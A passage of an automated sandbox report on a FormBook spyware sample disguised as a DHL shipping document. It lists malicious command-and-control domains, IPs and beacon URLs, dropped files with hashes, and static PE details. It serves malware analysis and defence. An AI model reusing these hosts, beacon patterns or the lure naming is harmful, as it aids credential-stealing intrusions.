                                                          http://www.staatslieden.bizexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=35-7052c.5.drfalse
                                                            		high
                                                            http://www.versicherungsgott.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fresnocap.comwww.vanguardfsm.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            50.87.195.203
                                                            		motherhoodinthegarden.comUnited States
                                                            		46606UNIFIEDLAYER-AS-1UStrue
                                                            37.97.254.29
                                                            		sowmedia.siteNetherlands
                                                            		20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                            46.23.69.44
                                                            		luxgudonu.storeUnited Kingdom
                                                            		13213UK2NET-ASGBtrue
                                                            217.160.0.32
                                                            		www.espisys-technology.comGermany
                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            104.233.254.113
                                                            		www.yh78898.comUnited States
                                                            		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                            199.192.28.110
                                                            		www.getpay.lifeUnited States
                                                            		22612NAMECHEAP-NETUStrue
                                                            81.169.145.88
                                                            		versicherungsgott.comGermany
                                                            		6724STRATOSTRATOAGDEtrue
                                                            113.52.135.193
                                                            		on-smooth.comHong Kong
                                                            		133380LAYER-ASLayerstackLimitedHKtrue

                                                            General Information

                                                            Joe Sandbox Version:37.0.0 Beryl
                                                            Analysis ID:830431
                                                            Start date and time:2023-03-20 11:26:09 +01:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 9m 51s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample file name:DHL_SHIPPING_DOCUMENT.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@12/5@9/8
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:
                                                            • Successful, ratio: 73.7% (good quality ratio 67.2%)
                                                            • Quality average: 74%
                                                            • Quality standard deviation: 31.4%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 84
                                                            • Number of non-executed functions: 193
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            11:27:20API Interceptor506x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            50.87.195.203DHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                            • www.motherhoodinthegarden.com/d2a3/?z8Ms4Q=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjCo/AHMmTcNPCg==&UKZNLZ=7hhm3OP9xhjxNyv4
                                                            nPAYMENT_COPY.exeGet hashmaliciousFormBookBrowse
                                                            • www.motherhoodinthegarden.com/d2a3/?sij=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8q7pgQiSlkubY0bCw==&mN95A=wglbAYGRw711_WMj
                                                            DHL Shipment Doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.motherhoodinthegarden.com/d2a3/?6R=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8q7pgQiSlkubY0bCw==&eb6=qO6-h0aa
                                                            37.97.254.29DHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                            • www.sowmedia.site/d2a3/?z8Ms4Q=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDiqi1wMAyATdSw==&UKZNLZ=7hhm3OP9xhjxNyv4
                                                            rCL-PLCOPY.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.sowmedia.site/f6nc/?jpSN=uabSuQk5bnXjSKY4&AioI=ID6VCHyWkkFC3x6K8CPOl077wNEUhCzYzd3u8BAueuTjsL5YJnhhUCqnHoCLkXFOFPiznqU97HiuaXlXt3TibU7kluY9yd8oxA==
                                                            nPAYMENT_COPY.exeGet hashmaliciousFormBookBrowse
                                                            • www.sowmedia.site/d2a3/?sij=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAKJAS/nSkI6EqJSg==&mN95A=wglbAYGRw711_WMj
                                                            h42aUGJl0v.exeGet hashmaliciousFormBookBrowse
                                                            • www.sowmedia.site/mwbm/?BPN8=kgNWzqioiLxBNglrvzjFKRPPlipKEUDF4J/0AN3Ed/2OQ3uMeD1Kx/L5bshLBlqvrGV3kHd7PEjQik8X7Zrdsos/h9Par5E52Q==&sygJ=tqGT_S_7
                                                            DHL Shipment Doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.sowmedia.site/d2a3/?6R=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAKJAS/nSkI6EqJSg==&eb6=qO6-h0aa

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.363ww.topMZykmSpz4e.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 39.109.117.109
                                                            o0G3mAJ7Ud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 39.109.117.109
                                                            DHL Shipment Doc.exeGet hashmaliciousFormBookBrowse
                                                            • 39.109.117.109
                                                            www.getpay.lifeDHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 199.192.28.110
                                                            nPAYMENT_COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 199.192.28.110
                                                            DHL Shipment Doc.exeGet hashmaliciousFormBookBrowse
                                                            • 199.192.28.110
                                                            www.espisys-technology.comDHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 217.160.0.32
                                                            MZykmSpz4e.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 217.160.0.32
                                                            nPAYMENT_COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 217.160.0.32
                                                            DHL Shipment Doc.exeGet hashmaliciousFormBookBrowse
                                                            • 217.160.0.32

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            UNIFIEDLAYER-AS-1USPayment_copy.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 192.254.233.157
                                                            DHL_PO1001910_Sample_Arrive.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 50.87.154.175
                                                            REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                            • 74.220.219.174
                                                            rocroc.exeGet hashmaliciousFormBookBrowse
                                                            • 192.185.52.247
                                                            eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 162.144.23.32
                                                            INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 162.241.217.78
                                                            Employees Pay Amendments.htmGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                            • 192.185.102.247
                                                            yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 192.185.46.57
                                                            DHL_SHIPPING_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 50.87.195.203
                                                            BKCtw7cPxM.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 192.185.150.20
                                                            No._I20220052.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 162.240.214.202
                                                            91ZkxXj12E.elfGet hashmaliciousMiraiBrowse
                                                            • 98.131.252.186
                                                            Gh6mFKMRMK.elfGet hashmaliciousMiraiBrowse
                                                            • 142.7.184.36
                                                            #Ufe0f#U25b6#Ufe0fNew_Voice_Mail.htmGet hashmaliciousHTMLPhisherBrowse
                                                            • 192.185.14.158
                                                            _ voice67874536728_3-3(4).hTmGet hashmaliciousHTMLPhisherBrowse
                                                            • 192.185.146.182
                                                            Payment_Swift_USD18,000.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 162.240.214.202
                                                            pandora.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 74.91.244.51
                                                            hindi.jsGet hashmaliciousAsyncRATBrowse
                                                            • 69.49.241.125
                                                            phish3.htmGet hashmaliciousHTMLPhisherBrowse
                                                            • 108.179.193.42
                                                            XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 69.49.230.239

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\35-7052c

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\help.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):94208
                                                            Entropy (8bit):1.2880737026424216
                                                            Encrypted:false
                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                            MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                            SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                            SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                            SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):95744
                                                            Entropy (8bit):6.2261764317924495
                                                            Encrypted:false
                                                            SSDEEP:1536:V0ZlV4KXc4OxQEsGZDmS+jtBaK/eRuZocSZUpxwkyBp+NnFsSW81kxgsWJjcdvbk:ed4KALsGZDN+x/yuZocSTkyBw9y8eASY
                                                            MD5:52BD228566EE8DDE1E37102049937D69
                                                            SHA1:B04481BE94D6AE60469226B33382139271D0A549
                                                            SHA-256:82281D2CEDDE42F2564C5506652128954061C5208D5C59BA5237875A96FA38C8
                                                            SHA-512:50350D708465FA51CA74050BEF07AF63EAEA9770E5A7A507BD62C4C4214EF6040CEC4FF3A3AAE6C87BD8FAE94D2999551825922A594FD7C22A99DC3BA2D2EEE4
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s...s...s...8...y...8.......8...g......U......b......`...8...j...s...........r.......r...Richs...........PE..L......d...............!.....|......".............@.........................................................................|k.......................................^...............................]..@............................................text............................... ..`.rdata...f.......h..................@..@.data...l............l..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):5585
                                                            Entropy (8bit):7.185773983646611
                                                            Encrypted:false
                                                            SSDEEP:96:Farc6oYV7OWg/DrYuTk2XO5oSwsBcWsYdfOQQSB+FCV76RdoT1uHDfRnTomtC8B3:FarcRQyJLhX1ShCvwjkMVWQ8JDtC8Mm9
                                                            MD5:DD97B27860101C0989FEB9552ABBD29B
                                                            SHA1:BC39A79D85EAE4EA267084C7253D18BF47398B87
                                                            SHA-256:323E755E8354C0AD25CA44CF297BAC5A7ECAD26C1578953566D20DB95110F93D
                                                            SHA-512:4343A67064EB05DD1493E052260577C2ECEDD9531DF9BAE9B0F8897210A011E9010817948EA9C56AF5487EBC95E5B728B16CD13C42F0BBCD34990156011B4DB7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                            C:\Users\user\AppData\Local\Temp\mvmtumtue.nvj

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):210477
                                                            Entropy (8bit):7.998822054659917
                                                            Encrypted:true
                                                            SSDEEP:3072:cY/mWoc3Tt/pj+DHK2cytCbzE2OYnxjbRQJvDRxeqVKwBYcQfG8LssuEXUhivzCe:3735G3cFzE2O8orRxeqVzbhjqzJWG
                                                            MD5:33B5DE50DB0BB7122119E41416DE2573
                                                            SHA1:9C557EB9394E46FAFE4ADCE3643666E74EE05974
                                                            SHA-256:BA6A2D48F1BA514A8302F8E0B1A656D1243CFCDAF4B0408ED5CFCF598E129411
                                                            SHA-512:CB1C24ACBBD4AA76CC295875A02282FDC8078CADEFE6CF3DC6EF804E037D2B00FE802E971FDB423BD4A8C160ADCD92F100506BFBCC8141CD9F48BE03EAF5BA9E
                                                            Malicious:false
                                                            Preview:,.7l.z.....8.h./..+('.x.S.P.nyt....V....v...._.....'?G.u...b........r..d.6.^=..V..S......d'.:...O.E..6x.A.*...x........j...g0.....7...."tv...xNC.-n.B.......,.e;4.....\h@.Q...O*.r..f.Y.J........;./. O.O..=.j.S......../...\:69..:%........0f.>...kz..........>......a.mn. .ny.....V.....J...._.....'?G.u.......< 0;8........(..:B.`T.Z....A..?...lBOu..,.Y...G.x......6........f{S1|Y.W.?.%o7...-..^......7y..md.J....\h@... _.*.r....HaS.\:.&..;./.qO5........^.......hN..\669.(.%..........f.....kz................a.m.P.nyt....V....v...._.....'?G.u.......< 0;8........(..:B.`T.Z....A..?...lBOu..,.Y...G.x......6........f{S1|Y.W.?.%o7...-..^......7y..md.J....\h@.Q...O*.r;.f.HeS.\.;&...;./.qO5.....j.........hN..\669.(.%..........f.....kz................a.m.P.nyt....V....v...._.....'?G.u.......< 0;8........(..:B.`T.Z....A..?...lBOu..,.Y...G.x......6........f{S1|Y.W.?.%o7...-..^......7y..md.J....\h@.Q...O*.r;.f.HeS.\.;&...;./.qO5.....j.........

                                                            C:\Users\user\AppData\Local\Temp\nsu5B23.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):320868
                                                            Entropy (8bit):7.627351926435029
                                                            Encrypted:false
                                                            SSDEEP:6144:D735G3cFzE2O8orRxeqVzbhjqzJWlaGKGsGZExocCk:Ds3cdoFxeW/aGKGsHG
                                                            MD5:877CEC6DAEAB0B4B42C7AB77077772C5
                                                            SHA1:90292679B84F9F1D096753521E4E87B0456D3DBA
                                                            SHA-256:6EA18BC067BD0206119ECB96AA6BA6326CCF32FBAACA5691091AD8F9E46B4E6B
                                                            SHA-512:A3A00F05D6C071146661BD24B6982103E5F940158D661C2FDFFE739AF08FFF51B80C871589489937FA2D1FACDE7A274E9853E3F8BAC4B79544B87FEF53739BEB
                                                            Malicious:false
                                                            Preview:V#......,...................i...@........"......V#..............................................................................*...........................................................................................................................................................G...................j...........................................................................................................................................N...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):5.937523402259023
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:DHL_SHIPPING_DOCUMENT.exe
                                                            File size:730562
                                                            MD5:04f5c33c1d3f795872b58f8c3922b49e
                                                            SHA1:3db181379815210d6fb0491d9660ddefff263224
                                                            SHA256:c0fee78265aef8793cb49690cc68fdf3debb84ab529bd59a2883a0c63ee0a6f5
                                                            SHA512:f91d065389d15ccc22ac765b9432fc7df44b6141618ae902fe8179eb2311a85e31796b87e15550d2240db835486ef8f5084be00cb71ed9dec9ff9b9d4af2c110
                                                            SSDEEP:12288:4YGGr4VVVVVVVVVVVVVVVVVVVVVVVVVVVVVHdx7OkVaa3bIsYyPouzayEtiQ:4Yed5ODdCPXzHE4Q
                                                            TLSH:D5F44AE1D68484E9FC6A4B76A8339C3A15677D7EB9B4601D661EB6312B732C30077C0B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                            File Icon

                                                            Icon Hash:71915e442028d505

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x403640
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:61259b55b8912888e90f516ca08dc514

                                                            Entrypoint Preview

                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 000003F4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebx, ebx
                                                            push 00008001h
                                                            mov dword ptr [ebp-14h], ebx
                                                            mov dword ptr [ebp-04h], 0040A230h
                                                            mov dword ptr [ebp-10h], ebx
                                                            call dword ptr [004080C8h]
                                                            mov esi, dword ptr [004080CCh]
                                                            lea eax, dword ptr [ebp-00000140h]
                                                            push eax
                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                            mov dword ptr [ebp-2Ch], ebx
                                                            mov dword ptr [ebp-28h], ebx
                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                            call esi
                                                            test eax, eax
                                                            jne 00007FB81882765Ah
                                                            lea eax, dword ptr [ebp-00000140h]
                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                            push eax
                                                            call esi
                                                            mov ax, word ptr [ebp-0000012Ch]
                                                            mov ecx, dword ptr [ebp-00000112h]
                                                            sub ax, 00000053h
                                                            add ecx, FFFFFFD0h
                                                            neg ax
                                                            sbb eax, eax
                                                            mov byte ptr [ebp-26h], 00000004h
                                                            not eax
                                                            and eax, ecx
                                                            mov word ptr [ebp-2Ch], ax
                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                            jnc 00007FB81882762Ah
                                                            and word ptr [ebp-00000132h], 0000h
                                                            mov eax, dword ptr [ebp-00000134h]
                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                            mov dword ptr [0042A318h], eax
                                                            xor eax, eax
                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                            movzx eax, ax
                                                            or eax, ecx
                                                            xor ecx, ecx
                                                            mov ch, byte ptr [ebp-2Ch]
                                                            movzx ecx, cx
                                                            shl eax, 10h
                                                            or eax, ecx

                                                            Rich Headers

                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x6a3b8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x3b0000x6a3b80x6a400False0.1916015625data3.688576847107456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x3b3580x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States
                                                            RT_ICON0x7d3800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States
                                                            RT_ICON0x8dba80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States
                                                            RT_ICON0x970500x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States
                                                            RT_ICON0x9c4d80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States
                                                            RT_ICON0xa07000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                                            RT_ICON0xa2ca80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                                            RT_ICON0xa3d500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States
                                                            RT_ICON0xa46d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                                            RT_DIALOG0xa4b400x100dataEnglishUnited States
                                                            RT_DIALOG0xa4c400x11cdataEnglishUnited States
                                                            RT_DIALOG0xa4d600x60dataEnglishUnited States
                                                            RT_GROUP_ICON0xa4dc00x84dataEnglishUnited States
                                                            RT_VERSION0xa4e480x230dataEnglishUnited States
                                                            RT_MANIFEST0xa50780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                            Imports

                                                            DLLImport
                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
